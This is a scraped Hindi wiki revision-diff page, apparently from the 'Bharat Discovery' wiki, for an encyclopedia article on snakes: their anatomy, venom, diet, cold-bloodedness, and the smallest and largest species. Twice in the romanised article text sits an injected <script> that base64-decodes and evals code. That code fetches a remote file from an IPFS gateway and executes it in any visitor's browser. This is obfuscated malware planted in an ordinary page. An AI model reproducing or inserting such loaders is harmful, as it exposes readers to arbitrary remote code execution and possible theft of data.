Difference between revisions of "सर्प"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(13 intermediate revisions by 6 users not shown)
Line 1: Line 1:
[[चित्र:Python-Snake.jpg|thumb|अज़गर सर्प<br />Python Snake]]
+
[[चित्र:Snake.jpg|thumb|250px|सर्प]]
'''सांप''' या '''सर्प''', पृष्ठवंशी [[सरीसृप]] वर्ग का प्राणी है। यह जल तथा थल दोनों जगह पाया जाता है। इसका शरीर लम्बी रस्सी के समान होता है जो पूरा का पूरा स्केल्स से ढँका रहता है। साँप के पैर नहीं होते हैं। यह निचले भाग में उपस्थित घड़ारियों की सहायता से चलता फिरता है। इसकी आँखों में पलके नहीं होती, ये हमेशा खुली रहती हैं। साँप विषैले तथा विषहीन दोनों प्रकार के होते हैं। इसके ऊपरी और निचले जबड़े की हड्डियाँ इस प्रकार की सन्धि बनाती है जिसके कारण इसका मुँह बड़े आकार में खुलता है। इसके मुँह में विष की थैली होती है जिससे जुडे़ दाँत तेज तथा खोखले होते हैं अतः इसके काटते ही विष शरीर में प्रवेश कर जाता है। दुनिया में सांपों की कोई 2500-3000 प्रजातियाँ पाई जाती हैं। <ref>{{cite web |url= http://www.reptileknowledge.com/articles/article9.php |title=रेप्टाइल नालेज
+
'''सांप''' या '''सर्प''', पृष्ठवंशी [[सरीसृप]] वर्ग का प्राणी है। यह जल तथा थल दोनों जगह पाया जाता है। इसका शरीर लम्बी रस्सी के समान होता है जो पूरा का पूरा स्केल्स से ढँका रहता है। साँप के पैर नहीं होते हैं। यह निचले भाग में उपस्थित घड़ारियों की सहायता से चलता फिरता है। इसकी आँखों में पलके नहीं होती, ये हमेशा खुली रहती हैं। साँप विषैले तथा विषहीन दोनों प्रकार के होते हैं। इसके ऊपरी और निचले जबड़े की हड्डियाँ इस प्रकार की सन्धि बनाती है जिसके कारण इसका मुँह बड़े आकार में खुलता है। इसके मुँह में विष की थैली होती है जिससे जुडे़ दाँत तेज़ तथा खोखले होते हैं अतः इसके काटते ही विष शरीर में प्रवेश कर जाता है। दुनिया में सांपों की कोई 2500-3000 प्रजातियाँ पाई जाती हैं। <ref>{{cite web |url= http://www.reptileknowledge.com/articles/article9.php |title=रेप्टाइल नालेज
 
|accessmonthday=[[23 अप्रॅल]]|accessyear=[[2009]]|format=पीएचपी|publisher=रेप्टाइल नालेज.कॉम|language=अँग्रेजी}}</ref> इसकी कुछ प्रजातियों का आकार 10 सेण्टीमीटर होता है जबकि [[अजगर]] नामक साँप 25 फिट तक लम्बा होता है। साँप [[मेढक]], [[छिपकली]], [[पक्षी]], [[चूहा|चूहे]] तथा दूसरे साँपों को खाता है। यह कभी-कभी बड़े जन्तुओं को भी निगल जाता है।
 
|accessmonthday=[[23 अप्रॅल]]|accessyear=[[2009]]|format=पीएचपी|publisher=रेप्टाइल नालेज.कॉम|language=अँग्रेजी}}</ref> इसकी कुछ प्रजातियों का आकार 10 सेण्टीमीटर होता है जबकि [[अजगर]] नामक साँप 25 फिट तक लम्बा होता है। साँप [[मेढक]], [[छिपकली]], [[पक्षी]], [[चूहा|चूहे]] तथा दूसरे साँपों को खाता है। यह कभी-कभी बड़े जन्तुओं को भी निगल जाता है।
[[चित्र:Cobra-Snake.jpg|thumb|कोबरा सर्प<br />Cobra Snake|left]]
+
 
 
सरीसृप वर्ग के अन्य सभी सदस्यों की तरह ही सर्प [[शीतरक्त का प्राणी]] है अर्थात् यह अपने शरीर का [[तापमान]] स्वंय नियंत्रित नहीं कर सकता है। इसके शरीर का तापमान वातावरण के ताप के अनुसार घटता या बढ़ता रहता है। यह अपने शरीर के तापमान को बढ़ाने के लिए भोजन पर निर्भर नहीं है इसलिए अत्यन्त कम भोजन मिलने पर भी यह जीवीत रहता है। कुछ साँपों को महीनों बाद-बाद भोजन मिलता है तथा कुछ सर्प वर्ष में मात्र एक बार या दो बार ढेड़ सारा खाना खाकर जीवीत रहते हैं। खाते समय साँप भोजन को चबाकर नहीं खाता है बल्कि पूरा का पूरा निकल जाता है। अधिकांश सर्पों के जबड़े इनके सिर से भी बड़े शिकार को निगल सकने के लिए अनुकुलित होते हैं। [[अफ्रीका]] का [[अजगर]] तो छोटी [[गाय]] आदि को भी निगल जाता है। विश्व का सबसे छोटा साँप थ्रेड स्नेक होता है । जो कैरेबियन सागर के सेट लुसिया माटिनिक तथा वारवडोस आदि द्वीपों में पाया जाता है वह केवल 10-12 सेंटीमीटर लंबा होता है। विश्व का सबसे लंबा सांप रैटिकुलेटेड पेथोन (जालीदार अजगर ) है, जो प्राय: 10 मीटर से भी अधिक लंबा तथा 120 किलोग्राम वजन तक का पाया जाता है । यह दक्षिण -पूर्वी एशिया तथा फिलीपींस में मिलता है।<ref>{{cite web |url= http://khulasaa.com/index.php?option=com_content&view=article&id=116&Itemid=48|title=साँपों का संसार |accessmonthday=[[23 अप्रॅल]]|accessyear=[[2009]]|format=पीएचपी|publisher=खुलासा.कॉम|language=}}</ref>
 
सरीसृप वर्ग के अन्य सभी सदस्यों की तरह ही सर्प [[शीतरक्त का प्राणी]] है अर्थात् यह अपने शरीर का [[तापमान]] स्वंय नियंत्रित नहीं कर सकता है। इसके शरीर का तापमान वातावरण के ताप के अनुसार घटता या बढ़ता रहता है। यह अपने शरीर के तापमान को बढ़ाने के लिए भोजन पर निर्भर नहीं है इसलिए अत्यन्त कम भोजन मिलने पर भी यह जीवीत रहता है। कुछ साँपों को महीनों बाद-बाद भोजन मिलता है तथा कुछ सर्प वर्ष में मात्र एक बार या दो बार ढेड़ सारा खाना खाकर जीवीत रहते हैं। खाते समय साँप भोजन को चबाकर नहीं खाता है बल्कि पूरा का पूरा निकल जाता है। अधिकांश सर्पों के जबड़े इनके सिर से भी बड़े शिकार को निगल सकने के लिए अनुकुलित होते हैं। [[अफ्रीका]] का [[अजगर]] तो छोटी [[गाय]] आदि को भी निगल जाता है। विश्व का सबसे छोटा साँप थ्रेड स्नेक होता है । जो कैरेबियन सागर के सेट लुसिया माटिनिक तथा वारवडोस आदि द्वीपों में पाया जाता है वह केवल 10-12 सेंटीमीटर लंबा होता है। विश्व का सबसे लंबा सांप रैटिकुलेटेड पेथोन (जालीदार अजगर ) है, जो प्राय: 10 मीटर से भी अधिक लंबा तथा 120 किलोग्राम वजन तक का पाया जाता है । यह दक्षिण -पूर्वी एशिया तथा फिलीपींस में मिलता है।<ref>{{cite web |url= http://khulasaa.com/index.php?option=com_content&view=article&id=116&Itemid=48|title=साँपों का संसार |accessmonthday=[[23 अप्रॅल]]|accessyear=[[2009]]|format=पीएचपी|publisher=खुलासा.कॉम|language=}}</ref>
  
== संदर्भ ==
+
{{प्रचार}}
 +
{{लेख प्रगति
 +
|आधार=
 +
|प्रारम्भिक=प्रारम्भिक2
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 +
==वीथिका==
 +
<gallery>
 +
चित्र:Python-Snake.jpg|[[अजगर]] सर्प<br />Python Snake
 +
चित्र:Cobra-Snake.jpg|कोबरा सर्प<br />Cobra Snake
 +
</gallery>
 +
{{संदर्भ ग्रंथ}}
 +
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
+
==संबंधित लेख==
[[श्रेणी:सरीसृप]]
+
{{जीव जन्तु}}
 +
[[Category:सरीसृप]]
 +
[[Category:प्राणि विज्ञान]]
 +
[[Category:प्राणि विज्ञान कोश]]
 +
__INDEX__

Latest revision as of 05:03, 29 May 2012

thumb|250px|sarp saanp ya sarp, prishthavanshi sarisrip varg ka prani hai. yah jal tatha thal donoan jagah paya jata hai. isaka sharir lambi rassi ke saman hota hai jo poora ka poora skels se dhanka rahata hai. saanp ke pair nahian hote haian. yah nichale bhag mean upasthit gh dariyoan ki sahayata se chalata phirata hai. isaki aankhoan mean palake nahian hoti, ye hamesha khuli rahati haian. saanp vishaile tatha vishahin donoan prakar ke hote haian. isake oopari aur nichale jab de ki haddiyaan is prakar ki sandhi banati hai jisake karan isaka muanh b de akar mean khulata hai. isake muanh mean vish ki thaili hoti hai jisase jude़ daant tez tatha khokhale hote haian atah isake katate hi vish sharir mean pravesh kar jata hai. duniya mean saanpoan ki koee 2500-3000 prajatiyaan paee jati haian. [1] isaki kuchh prajatiyoan ka akar 10 sentimitar hota hai jabaki ajagar namak saanp 25 phit tak lamba hota hai. saanp medhak, chhipakali, pakshi, choohe tatha doosare saanpoan ko khata hai. yah kabhi-kabhi b de jantuoan ko bhi nigal jata hai.

sarisrip varg ke any sabhi sadasyoan ki tarah hi sarp shitarakt ka prani hai arthath yah apane sharir ka tapaman svany niyantrit nahian kar sakata hai. isake sharir ka tapaman vatavaran ke tap ke anusar ghatata ya badhata rahata hai. yah apane sharir ke tapaman ko badhane ke lie bhojan par nirbhar nahian hai isalie atyant kam bhojan milane par bhi yah jivit rahata hai. kuchh saanpoan ko mahinoan bad-bad bhojan milata hai tatha kuchh sarp varsh mean matr ek bar ya do bar dhe d sara khana khakar jivit rahate haian. khate samay saanp bhojan ko chabakar nahian khata hai balki poora ka poora nikal jata hai. adhikaansh sarpoan ke jab de inake sir se bhi b de shikar ko nigal sakane ke lie anukulit hote haian. aphrika ka ajagar to chhoti gay adi ko bhi nigal jata hai. vishv ka sabase chhota saanp thred snek hota hai . jo kairebiyan sagar ke set lusiya matinik tatha varavados adi dvipoan mean paya jata hai vah keval 10-12 seantimitar lanba hota hai. vishv ka sabase lanba saanp raitikuleted pethon (jalidar ajagar ) hai, jo pray: 10 mitar se bhi adhik lanba tatha 120 kilogram vajan tak ka paya jata hai . yah dakshin -poorvi eshiya tatha philipians mean milata hai.[2]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vithika

tika tippani aur sandarbh

  1. reptail nalej (aangreji) (piechapi) reptail nalej.k aaum. abhigaman tithi: 23 aprॅl, 2009.
  2. saanpoan ka sansar (piechapi) khulasa.k aaum. abhigaman tithi: 23 aprॅl, 2009.

sanbandhit lekh